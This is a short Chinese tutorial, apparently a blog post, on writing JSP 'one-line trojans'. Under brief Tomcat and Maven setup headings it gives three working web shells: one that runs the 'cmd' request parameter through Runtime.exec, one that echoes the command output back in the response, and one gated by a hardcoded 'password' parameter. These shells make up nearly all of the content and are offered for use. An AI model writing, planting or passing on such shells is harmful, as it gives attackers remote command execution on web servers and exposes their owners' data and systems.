jsp回显一句话木马

文章目录

• jsp回显一句话木马
• 一、搭建web服务
• • 1、创建空白maven项目，搭建本地tomcat
  • 2、引入servlet的pom依赖
• 二、无回显一句话
• 三、带回显一句话
• 三、有密码带回显一句话

提示：以下是本篇文章正文内容，下面案例可供参考

一、搭建web服务

1、创建空白maven项目，搭建本地tomcat

2、引入servlet的pom依赖

二、无回显一句话

 <%Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));%>

http://localhost:8003/index.jsp” />

三、带回显一句话

代码如下（示例）：

<%Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));String line;while ((line = bufferedReader.readLine()) != null){response.getWriter().println(line);}%>

三、有密码带回显一句话

<%if ("password".equals(request.getParameter("pass"))){Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));String line;while ((line = bufferedReader.readLine()) != null){response.getWriter().println(line);}}%>